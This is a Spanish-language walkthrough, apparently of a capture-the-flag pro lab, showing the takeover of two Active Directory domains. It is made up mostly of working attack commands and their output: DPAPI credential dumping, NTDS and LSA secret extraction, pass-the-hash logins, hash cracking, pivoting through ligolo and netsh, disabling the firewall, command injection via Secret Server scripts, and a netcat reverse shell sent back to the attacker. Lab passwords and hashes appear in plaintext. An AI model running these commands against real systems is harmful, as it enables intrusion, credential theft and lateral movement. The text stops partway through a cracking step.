    [X] MasterKey GUID not in cache: {f77aed43-beff-4c38-805d-656a7bc7097a}

Folder       : C:\Users\billing_user\AppData\Roaming\Microsoft\Credentials\

  CredFile           : C48FA9BC4637C67CB306A191C3C91E23

    guidMasterKey    : {56a4e7f0-7ae5-4a66-86c8-abb9aa484acd}
    size             : 430
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Enterprise Credential Data

    LastWritten      : 10/14/2020 5:35:22 AM
    TargetName       : Domain:interactive=DAEDALUS\svc_backup
    TargetAlias      :
    Comment          :
    UserName         : DAEDALUS\svc_backup
    Credential       : jkQXAnHKj#7w#XS$

PS C:\Users\Administrator\Documents>

Comprobamos con crackmapexec y son credenciales validas a nivel de dominio

❯ crackmapexec smb dc1.daedalus.local -u svc_backup -p jkQXAnHKj#7w#XS$
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)  
SMB         daedalus.local  445    DC1              [+] daedalus.local\svc_backup:jkQXAnHKj#7w#XS$

Para enumerar un poco el dominio usaremos bloodhound, nos autenticaremos con las credenciales de svc_backup y toda la informacion la guardamos en un zip

❯ bloodhound-python -u svc_backup -p jkQXAnHKj#7w#XS$ -ns 192.168.10.6 -d daedalus.local -c All --zip  
INFO: Found AD domain: daedalus.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.daedalus.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to GC LDAP server: dc1.daedalus.local
INFO: Connecting to LDAP server: dc1.daedalus.local
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 7 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WEB01.daedalus.local
INFO: Querying computer: DC1.daedalus.local
INFO: Done in 00M 34S
INFO: Compressing output into 20230901100806_bloodhound.zip

Despues de subir el zip a bloodhound encontramos el usuario svc_backup que pertenece al grupo Remote Management Users asi que se puede conectar a winrm

Simplemente nos conectamos con evil-winrm como el usuario svc_backup hacia el equipo DC1 y obtenemos una powershell donde podemos leer una nueva flag

❯ evil-winrm -i dc1.daedalus.local -u svc_backup -p jkQXAnHKj#7w#XS$  
PS C:\Users\svc_backup.DAEDALUS\Documents> whoami
daedalus\svc_backup
PS C:\Users\svc_backup.DAEDALUS\Documents> type ..\Desktop\flag.txt
ASCENSION{15nT_dPaP1_s3cuRe?}
PS C:\Users\svc_backup.DAEDALUS\Documents>


Wingman

ASCENSION{0G_adm1ni5tR@tor}


Podemos usar winpeas.exe para enumerar la maquina, lo subimos y lo ejecutamos

PS C:\Users\svc_backup.DAEDALUS\Documents> upload winpeas.exe

Info: Uploading winpeas.exe to C:\Users\svc_backup.DAEDALUS\Documents\winpeas.exe  

Data: 3166888 bytes of 3166888 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup.DAEDALUS\Documents> .\winpeas.exe

Entre la informacion que nos detecta encontramos otra unidad logica que es la E:

ÉÍÍÍÍÍÍÍÍÍ͹ Drives Information
È Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 10 GB)(Permissions: Users [AppendData/CreateDirectories])
    E:\ (Type: Fixed)(Volume label: Backups)(Filesystem: NTFS)(Available space: 4 GB)(Permissions: Users [AppendData/CreateDirectories])

Cambiamos a la unidad E: donde despues de navegar entre directorios vemos un archivo Users.txt que nos muestra credenciales para el usuario Administrator

PS C:\Users\svc_backup.DAEDALUS\Documents> E:
PS E:\> dir

    Directory: E:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/13/2020   3:54 PM                Annual IT Compliance Report - Export  

PS E:\> cd 'Annual IT Compliance Report - Export'
PS E:\Annual IT Compliance Report - Export> dir

    Directory: E:\Annual IT Compliance Report - Export

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/10/2020   6:04 AM           4852 Builtin.txt
-a----       10/10/2020   6:04 AM            530 Daedalus.txt
-a----       10/10/2020   6:05 AM           2541 Users.txt

PS E:\Annual IT Compliance Report - Export> type Users.txt
Name	Type	Description
Administrator	User	DSRM Password: kF4df76fj*JfAcf73j
.........................................................
PS E:\Annual IT Compliance Report - Export>

Esta contraseña es valida para el usuario Administrator en el DC1 autenticandose localmente, pero al ser DC podemos dumpear el ntds y ver todos los hashes

❯ crackmapexec smb dc1.daedalus.local -u Administrator -p 'kF4df76fj*JfAcf73j' --local-auth
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:DC1) (signing:True) (SMBv1:False)  
SMB         daedalus.local  445    DC1              [+] DC1\Administrator:kF4df76fj*JfAcf73j (Pwn3d!)

❯ crackmapexec smb dc1.daedalus.local -u Administrator -p 'kF4df76fj*JfAcf73j' --local-auth --ntds drsuapi
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:DC1) (signing:True) (SMBv1:False)
SMB         daedalus.local  445    DC1              [+] DC1\Administrator:kF4df76fj*JfAcf73j (Pwn3d!)
SMB         daedalus.local  445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         daedalus.local  445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:a3ff633d308be8e06dbb4e2e88783533:::
SMB         daedalus.local  445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         daedalus.local  445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e1e73de1f69e094386b8496fdbdaa90:::
SMB         daedalus.local  445    DC1              daedalus.local\elliot:1112:aad3b435b51404eeaad3b435b51404ee:74fdf381a94e1e446aaedf1757419dcd:::
SMB         daedalus.local  445    DC1              daedalus.local\svc_backup:1602:aad3b435b51404eeaad3b435b51404ee:f913cd9d773be0d48389d45a20b6364a:::
SMB         daedalus.local  445    DC1              daedalus.local\billing_user:1603:aad3b435b51404eeaad3b435b51404ee:65043c86ce4386582442450feed8ce53:::  
SMB         daedalus.local  445    DC1              DC1$:1000:aad3b435b51404eeaad3b435b51404ee:c5a43d3b4bb5b1e5aa0c0fd1fc33a8fb:::
SMB         daedalus.local  445    DC1              WEB01$:1109:aad3b435b51404eeaad3b435b51404ee:cea841ef31ca13817f6d6c73b3c26b1a:::
SMB         daedalus.local  445    DC1              MEGAAIRLINE$:1108:aad3b435b51404eeaad3b435b51404ee:f68f00c91f2b98c63593309aa61ae76d:::

Con este hash podriamos simplemente conectarnos con evil-winrm al equipo DC1

❯ evil-winrm -i dc1.daedalus.local -u Administrator -H a3ff633d308be8e06dbb4e2e88783533  
PS C:\Users\Administrator\Documents> whoami
daedalus\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ASCENSION{0G_adm1ni5tR@tor}
PS C:\Users\Administrator\Documents>

Aunque si dumpeamos los secretos lsa encontramos una contraseña en texto plano para Administrator, tambien es valida pero en este caso a nivel de dominio

❯ crackmapexec smb dc1.daedalus.local -u Administrator -p 'kF4df76fj*JfAcf73j' --local-auth --lsa
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:DC1) (signing:True) (SMBv1:False)
SMB         daedalus.local  445    DC1              [+] DC1\Administrator:kF4df76fj*JfAcf73j (Pwn3d!)
SMB         daedalus.local  445    DC1              [+] Dumping LSA secrets
SMB         daedalus.local  445    DC1              MEGAAIRLINE.LOCAL/Administrator:$DCC2$10240#Administrator#3ea6e70c7142de7e521195f33086a2bf: (2020-10-13 12:53:58)
SMB         daedalus.local  445    DC1              DAEDALUS\DC1$:aes256-cts-hmac-sha1-96:5c286354381f92663fa48d68aacb74ad4439ef2bdb189a7891f587fa4ec78503
SMB         daedalus.local  445    DC1              DAEDALUS\DC1$:aes128-cts-hmac-sha1-96:a210ba502053511074c76665ca98addf
SMB         daedalus.local  445    DC1              DAEDALUS\DC1$:des-cbc-md5:3b7a6be3e092bcae
SMB         daedalus.local  445    DC1              DAEDALUS\DC1$:plain_password_hex:80ee1497c9f6cc7d6116bdd95938572bbab0d4bdf022ba201d1e4dbab1d7ead524c8eff4bc4a864c7569f6dff30c89914d9f83e47840a8e7705bb9c2dc0b8be208e88e5a846e94f70310c249bac1cef10803a83bd9bab790a6d02146918775ff6bff9d8c082378c0f783d4a9a29fb3eb81775f8eac2e0f62075503f39209ea18634b7a58e180e43cfe49cbc46801ed9a3a57a9033940a8867be1febd9dc9340abcab572f3999a0f279538b964ed3e16aa32e2d5567089a6835be29297f44171204163280c96755b5889278b2bd21a7da8c289462368bb1357d2f9ef0d64a16d23c5307464ba912c36be823632adb11e4  
SMB         daedalus.local  445    DC1              DAEDALUS\DC1$:aad3b435b51404eeaad3b435b51404ee:c5a43d3b4bb5b1e5aa0c0fd1fc33a8fb:::
SMB         daedalus.local  445    DC1              DAEDALUS\administrator:pleasefastenyourseatbelts01!
SMB         daedalus.local  445    DC1              dpapi_machinekey:0xee3ee8172d485d91d928e75a6199a2d9d1552d2a
dpapi_userkey:0x872350e7691cd1f10c04962e21f42f7921a64796
SMB         daedalus.local  445    DC1              NL$KM:4d9aaba35a7a2f5025fc831a10fe1ea5d3b99da8b54eeb602bd678537b732ae044a8770c4836372680d02c90d416aae566534b7fa92d50998a260a20400d9be1

Con esta contraseña tambien podriamos conectarnos al DC1 usando evil-winrm

❯ evil-winrm -i dc1.daedalus.local -u Administrator -p pleasefastenyourseatbelts01!  
PS C:\Users\Administrator\Documents> whoami
daedalus\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ASCENSION{0G_adm1ni5tR@tor}
PS C:\Users\Administrator\Documents>


Corridor

ASCENSION{n0t_so_s3cR3t_H1sToRy}


Ya como administradores del dominio en el equipo DC1 ademas de la interfaz del dominio nos encontramos con otra interfaz de red que es la 192.168.11.0/24

PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet1 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::7d64:b14e:3dce:3e00%14  
   IPv4 Address. . . . . . . . . . . : 192.168.11.6
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 5:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2cb9:1377:b95:2754%7
   IPv4 Address. . . . . . . . . . . : 192.168.10.6
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

PS C:\Users\Administrator\Documents>

Enumerando un poco logramos encontrar la razon, y es que ademas del dominio daedalus.local comprometido existe otro que se nombra megaairline.local

PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1  
PS C:\Users\Administrator\Documents> Invoke-MapDomainTrust

SourceName      : daedalus.local
TargetName      : megaairline.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 10/10/2020 5:48:47 PM
WhenChanged     : 9/1/2023 2:59:58 AM

PS C:\Users\Administrator\Documents>

Tenemos un problema y es que desde nuestra sesion de ligolo que tenemos en WEB01 no tienemos acceso a la .11.0/24 y desde el equipo DC1 no tenemos conexion directa hacia nuestro equipo, iniciaremos redirigiendo en ligolo desde WEB01 todo lo que llegue por el puerto 8888 por la .10.39 a nuestro equipo

[Agent : WEB01\svc_dev@WEB01] » listener_add --addr 192.168.10.39:8888 --to 10.10.14.10:8888  
INFO[0173] Listener created on remote agent! 
[Agent : WEB01\svc_dev@WEB01] »

Despues simplemente enviamos la conexion desde DC1 a WEB01 por el puerto 8888

PS C:\Users\Administrator\Documents> .\agent.exe -connect 192.168.10.39:8888 -ignore-cert

Finalmente recibimos una sesion que recibimos en ligolo y procedemos a iniciarla

Agent : WEB01\svc_dev@WEB01] » 
INFO[0179] Agent joined.           name="DAEDALUS\\Administrator@DC1" remote="10.10.14.10:47204"  
[Agent : WEB01\svc_dev@WEB01] » session
? Specify a session : 2 - DAEDALUS\Administrator@DC1 - 10.10.14.10:47204
[Agent : DAEDALUS\Administrator@DC1] » start
INFO[0190] Starting tunnel to DAEDALUS\Administrator@DC1 
[Agent : DAEDALUS\Administrator@DC1] »

Agregamos el segmento 192.168.10.0/24 a la interfaz de ligolo y ahora tenemos conexión con todos los equipos de la red, podemos comprobarlo con un ping

❯ sudo ip route add 192.168.11.0/24 dev ligolo

❯ ping -c1 -w1 192.168.11.6
PING 192.168.11.6 (192.168.11.6) 56(84) bytes of data.
64 bytes from 192.168.11.6: icmp_seq=1 ttl=64 time=162 ms

--- 192.168.11.6 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms  
rtt min/avg/max/mdev = 161.931/161.931/161.931/0.000 ms

Escaneando los hosts de este segmento, ademas del propio DC1 podemos ver otros 2 equipos que son MS01 y DC2 pertenecientes al dominio megaairline.local

❯ crackmapexec smb 192.168.11.0/24
SMB         192.168.11.6    445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)
SMB         192.168.11.201  445    DC2              [*] Windows 10.0 Build 17763 x64 (name:DC2) (domain:megaairline.local) (signing:True) (SMBv1:False)
SMB         192.168.11.210  445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:megaairline.local) (signing:False) (SMBv1:False)

Por comodidad y posibles proximos ataques agregaremos al archivo /etc/hosts las direcciones con su dominio que sera el hostname y el dominio megaairline.local

❯ echo "192.168.11.210 ms01.megaairline.local" | sudo tee -a /etc/hosts

❯ echo "192.168.11.201 megaairline.local dc2.megaairline.local" | sudo tee -a /etc/hosts

Para saber por donde iniciar escanearemos los hosts de esta red con nmap, en el equipo MS01 podemos ver el puerto 80 abierto que indica un posible servicio web

❯ nmap ms01.megaairline.local -Pn
Nmap scan report for ms01.megaairline.local (192.168.11.210)  
PORT     STATE SERVICE
80/tcp   open  http
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

❯ nmap dc2.megaairline.local -Pn
Nmap scan report for dc2.megaairline.local (192.168.11.201)  
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm

Al entrar a la web simplemente nos encontramos con la pagina por defecto de IIS

Ayudandonos de wfuzz podemos aplicar fuerza bruta para descubrir directorios en la web a traves de un diccionario, al hacerlo encontramos el directorio /secretserver

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://ms01.megaairline.local/FUZZ --hc 404 -t 100
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ms01.megaairline.local/FUZZ
Total requests: 1185254

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000651052:   302        3 L      8 W        167 Ch      "secretserver"

Este directorio solo tiene un login de thycotic donde necesitaremos credenciales

Cuando dumpeamos el ntds de DC1 podiamos ver el hash NT del usuario elliot que no ocupamos, si lo pasamos a john logramos crackearlo y obtener la contraseña

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --format=NT  
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
84@m!n@9         (?)
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

Curiosamente estas credenciales tambien son validas por smb para el nuevo dominio

❯ crackmapexec smb dc2.megaairline.local -u elliot -p '84@m!n@9'
SMB         megaairline.local 445    DC2              [*] Windows 10.0 Build 17763 x64 (name:DC2) (domain:megaairline.local) (signing:True) (SMBv1:False)  
SMB         megaairline.local 445    DC2              [+] megaairline.local\elliot:84@m!n@9

Las credenciales obtenidas tambien podemos usarlas para el login de thycotic autenticandonos como el usuario elliot, de esta manera obtenemos acceso

Si vamos a Admin > Scripts podemos ver varios existentes en el apartado SSH

Al intentar ejecutarlo nos pedira unos datos, podemos seleccionar 127.0.0.1 como servidor y como credenciales las de elliot a nivel de dominio, parece se conectara a ssh ademas nos pide un argumento pero por ahora lo dejaremos en blanco

Enviamos y en el resultado podemos ver un error de un comando ejecutado en la consola, por lo que es probable que se conecte a ssh internamente y lo ejecute

Podemos dejar como argumento un simple whoami y en la respuesta podemos ver el output ejecutado como el usuario elliot, asi que podemos ejecutar comandos

Finalmente cambiamos el comando y podemos leer la flag en el escritorio de este


Upgrade

ASCENSION{sL4ck1ng_0n_enCrypt1oN}


Recordemos que no tenemos conexion directa, para facilitar algunas cosas usaremos el DC1, pero antes habilitaremos RDP y nos conectamos usando xfreerdp

❯ crackmapexec smb dc1.daedalus.local -u Administrator -p pleasefastenyourseatbelts01! -M rdp -o ACTION=enable
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)  
SMB         daedalus.local  445    DC1              [+] daedalus.local\Administrator:pleasefastenyourseatbelts01! (Pwn3d!)
RDP         daedalus.local  445    DC1              [+] RDP enabled successfully

❯ xfreerdp /u:Administrator /p:pleasefastenyourseatbelts01! /v:dc1.daedalus.local /dynamic-resolution /cert:ignore

Para montar un servidor http en el DC1 que tiene conexion directa con el otro dominio primero subiremos un msi de python y lo instalaremos para poder usarlo

PS C:\Users\Administrator\Documents> upload python-3.4.4.amd64.msi

Info: Uploading python-3.4.4.amd64.msi to C:\Users\Administrator\Documents\python-3.4.4.amd64.msi  

Data: 34739540 bytes of 34739540 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

Ya instalado podemos usar python para crear un servidor http en Documents donde subiremos todo lo que querramos compartir en un servidor http desde el DC1

Tenemos otra limitacion y es el firewall pero podemos deshabilitarlo facilmente

PS C:\Users\Administrator\Documents> Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False  
PS C:\Users\Administrator\Documents>

Ahora subiremos el netcat.exe para que se comparta con el servidor http creado

PS C:\Users\Administrator\Documents> upload netcat.exe

Info: Uploading netcat.exe to C:\Users\Administrator\Documents\netcat.exe  

Data: 58260 bytes of 58260 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

Como comando ejecutado como elliot enviaremos una peticion con curl al netcat.exe compartido en el DC1 y lo guardaremos en directorio C:\ProgramData

curl 192.168.11.6/netcat.exe -o C:\ProgramData\netcat.exe

Al hacerlo recibimos una peticion en el servidor http montado, significa que el compilado de netcat.exe se ha guardado en la maquina victima correctamente

PS C:\Users\Administrator\Documents> python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 ...
192.168.11.210 - - "GET /netcat.exe HTTP/1.1" 200 -

Para poder enviarnos una revshell usaremos netsh para redirigir el trafico en el puerto 4444 del DC1 a WEB01 y de WEB01 a nuestro equipo por el mismo puerto

PS C:\Users\Administrator\Documents> netsh interface portproxy add v4tov4 listenaddress=192.168.11.6 listenport=4444 connectaddress=192.168.10.39 connectport=4444  
PS C:\Users\Administrator\Documents>


PS C:\Users\Administrator\Documents> netsh interface portproxy add v4tov4 listenaddress=192.168.10.39 listenport=4444 connectaddress=10.10.14.10 connectport=4444  
PS C:\Users\Administrator\Documents>

Finalmente en la web ejecutamos el netcat.exe para que envie una powershell a DC1 que despues de redirigir el trafico la enviara a nuestro equipo atacante

cmd /c C:\ProgramData\netcat.exe -e powershell 192.168.11.6 4444

Al hacerlo recibimos una powershell como el usuario elliot en el equipo MS01

❯ netcat -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.13.38.20
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Users\elliot> whoami
megaairline\elliot
PS C:\Users\elliot>

En el directorio de descargas podemos encontrar el instlador de Slack, esto realmente es una pequeña pista ya que despues de enumerar podemos encontrar dentro de Chrome una db con el nombre 7 que copiaremos a C:\ProgramData

PS C:\Users\elliot\Downloads> dir

    Directory: C:\Users\elliot\Downloads

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/16/2020   8:00 AM       83040752 SlackSetup.exe  

PS C:\Users\elliot\Downloads>


PS C:\Users\elliot\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_app.slack.com_0.indexeddb.blob\1\00> dir

    Directory: C:\Users\elliot\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_app.slack.com_0.indexeddb.blob\1\00

Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/16/2020   9:28 AM         170673 7                             

PS C:\Users\elliot\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_app.slack.com_0.indexeddb.blob\1\00> cp 7 C:\ProgramData  
PS C:\Users\elliot\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_app.slack.com_0.indexeddb.blob\1\00>

Podemos usar Get-Strings para buscar cadenas de texto, la ultima linea llama la atencion ya que habla de elliot como cuenta admin y nos da una contraseña

PS C:\ProgramData> Import-Module .\Get-Strings.ps1
PS C:\ProgramData> Get-Strings 7 | Select-String password

needs_initial_password_setF"
text"6local account username: elliot password: LetMeInAgain!{
text"6local account username: elliot password: LetMeInAgain!"
text"!MS01 admin account and password: {
text";MS01 admin account and password: ```elliot LetMeInAgain!```"  

PS C:\ProgramData>

Mirando los administradores locales si que encontramos a elliot pero a nivel local y no de dominio asi que aunque somos el usuario elliot no nos servira de nada

PS C:\ProgramData> net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain  

Members

-------------------------------------------------------------------------------
Administrator
elliot
MEGAAIRLINE\Domain Admins
The command completed successfully.

PS C:\ProgramData>

Al probar la contraseña que encontramos para el usuario elliot nos devuelve que es valida a nivel local, sin embargo no un Pwn3d! como se esperaria de primeras

❯ crackmapexec smb ms01.megaairline.local -u elliot -p LetMeInAgain! --local-auth 
SMB         ms01.megaairline.local 445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)  
SMB         ms01.megaairline.local 445    MS01             [+] MS01\elliot:LetMeInAgain!

El servicio RDP esta abierto asi que podemos simplemente conectarnos y dentro abrir una cmd, donde tenemos privilegios de admin y podemos leer la flag

❯ xfreerdp /u:elliot /p:LetMeInAgain! /v:ms01.megaairline.local /dynamic-resolution /cert:ignore

Nuevamente usaremos SharpDPAPI donde logramos encontrar la contraseña del usuario Administrator en MS01 probablemente solo de manera local

PS C:\Users\elliot.MS01\Desktop> curl 192.168.11.6/SharpDPAPI.exe -o SharpDPAPI.exe
PS C:\Users\elliot.MS01\Desktop> .\SharpDPAPI.exe machinetriage

  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.11.3


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: 487772FBFFEDCCD08B08239AF25F7C42A0C2AB7636CBEDE3241336B34893574F96C27A7411F18A6C
[*]    m/u : 487772FBFFEDCCD08B08239AF25F7C42A0C2AB76 / 36CBEDE3241336B34893574F96C27A7411F18A6C  

[*] SYSTEM master key cache:

{236ba6f2-6d51-4312-beb2-365eb2897601}:E9AB8AB7568ABEEA751B1D5B4A8C14A682DE5CC4
{6af669bc-5e57-413c-ba26-6d63fb62c794}:78EF352E05532ADF635D9AFEEC839B96E99601A6
{b88476d3-b611-4e16-be7f-8525fb5dcd4f}:14F7A4B882D7D01EDF4C9015E10868649F58D159
{bd0e6c0c-1301-4c56-90f0-4dd4504dc8ce}:F2FBB1F90F09F29D7B20D4366BCE33C9B439CC81
{c21c474c-ad42-425f-babf-623340194247}:451EE9B8011CEF62A3404F44A64B2ACD93CD9FDB
{360b584f-7027-4f23-85ad-b13720f57979}:58B9072F514E39AB9036140775FA34FE852924E4
{b0724227-4609-4b11-81ad-4694b3e3e947}:C5CCE9487809C753C814848080BF1DD16985B509
{e85f73ce-4638-49bf-a1b2-984e0be4890b}:1C834ECB6C3DC3502001A4974DDF46E01141FDDF
{f52cb0ce-0f39-422a-bff2-68b49e60beb5}:11D1FB8FB59C7E18C8600959C13DF23FE22C8ADE

[*] Triaging System Credentials

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 7E6A4CF66305FBFB5B060CD27A723F46

    guidMasterKey    : {360b584f-7027-4f23-85ad-b13720f57979}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 10/14/2020 10:33:07 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{A7499C51-AB7C-44BF-9314-6A305239E450}
    TargetAlias      :
    Comment          :
    UserName         : MS01\Administrator
    Credential       : FWErfsgt4ghd7f6dwx

PS C:\Users\elliot.MS01\Desktop>

Comprobando la contraseña con crackmapexec localmente nos devuelve un Pwn3d! asi que podemos conectar con wmiexec y obtener una powershell como este usuario

❯ crackmapexec smb ms01.megaairline.local -u Administrator -p FWErfsgt4ghd7f6dwx --local-auth
SMB         ms01.megaairline.local 445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)  
SMB         ms01.megaairline.local 445    MS01             [+] MS01\Administrator:FWErfsgt4ghd7f6dwx (Pwn3d!)


❯ impacket-wmiexec WORKGROUP/Administrator:FWErfsgt4ghd7f6dwx@ms01.megaairline.local -shell-type powershell  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> whoami
ms01\administrator

PS C:\> type C:\Users\Administrator\Desktop\flag.txt
ASCENSION{sL4ck1ng_0n_enCrypt1oN}

PS C:\>


Maverick

ASCENSION{g0t_a1L_7h3_ac3s}


Al dumpear los secretos lsa de este equipo nos encontramos con algunos hashes en formato mscash2, uno pertenece a un usuario que aun no tenemos y es anna

❯ crackmapexec smb ms01.megaairline.local -u Administrator -p FWErfsgt4ghd7f6dwx --local-auth --lsa
SMB         ms01.megaairline.local 445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ms01.megaairline.local 445    MS01             [+] MS01\Administrator:FWErfsgt4ghd7f6dwx (Pwn3d!)
SMB         ms01.megaairline.local 445    MS01             [+] Dumping LSA secrets
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE.LOCAL/Administrator:$DCC2$10240#Administrator#3ea6e70c7142de7e521195f33086a2bf: (2021-06-09 12:56:43)
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE.LOCAL/elliot:$DCC2$10240#elliot#1985a8159434672943be0d4f94cea4b2: (2020-10-16 15:54:05)
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE.LOCAL/anna:$DCC2$10240#anna#beff6c5d84183e72d1ef69f18051ed49: (2020-10-14 14:54:00)
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE\MS01$:aes256-cts-hmac-sha1-96:a134ed2a75cbd3ff0be93c11d979fecd5cf81ff7c9194b8eea3c368efb5d8b3c
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE\MS01$:aes128-cts-hmac-sha1-96:a271a2cc8d68a84c3ee70450a976bfdc
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE\MS01$:des-cbc-md5:c76e529e62c28ae0
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE\MS01$:plain_password_hex:40e0e091a87bcb8ef7b8d715da6ebe499ab5fa7494a3d2c4f704a871f131ab5908d97abde6ef23214fd85d209067b0dc14b606407308a6fd5e190c465f91868de51efc531baae61087b2ad4fd5509433c3f9c648e130e4e3680f49acd3d94804a3d7437f859997d11ed885f8af3f937842004b7dfca47a2ac977534a4244bfcfa2fa73bd0cbf3618c54aff2e17fd54b7ad270c9c1c9c4f68277a19b8885a1d53cfa5f1e43e7f1bacfabcb6b2a8fa570bbe2310365d9b49aedf48c660cddf166f145ac7a9a72b584849ec7605719c3f71d0d132ab3824fac0db227a859af2148dbbd551824133acd775119b5b86c3d9ca  
SMB         ms01.megaairline.local 445    MS01             MEGAAIRLINE\MS01$:aad3b435b51404eeaad3b435b51404ee:1a60da9a2479af44780749249ed6248f:::
SMB         ms01.megaairline.local 445    MS01             dpapi_machinekey:0x487772fbffedccd08b08239af25f7c42a0c2ab76
dpapi_userkey:0x36cbede3241336b34893574f96c27a7411f18a6c
SMB         ms01.megaairline.local 445    MS01             NL$KM:33eb2a1da2aff443ecaf9f474df4857987a84e71648fd00f94e3041305cdda929bd1eb02ea266e4b0e77996a29737c20d1767bb63e7f42cf108aaa01d849883d

El rockyou.txt no nos ayudara en este caso, pero al probar con contraseñas que tenemos del mismo lab, anna reutiliza la contraseña de Administrator en MS01

❯ john -w:passwords hashes
Warning: detected hash type "mscash2", but the string is also recognized as "HMAC-MD5"
Use the "--format=HMAC-MD5" option to force loading these as that type instead
Using default input encoding: UTF-8
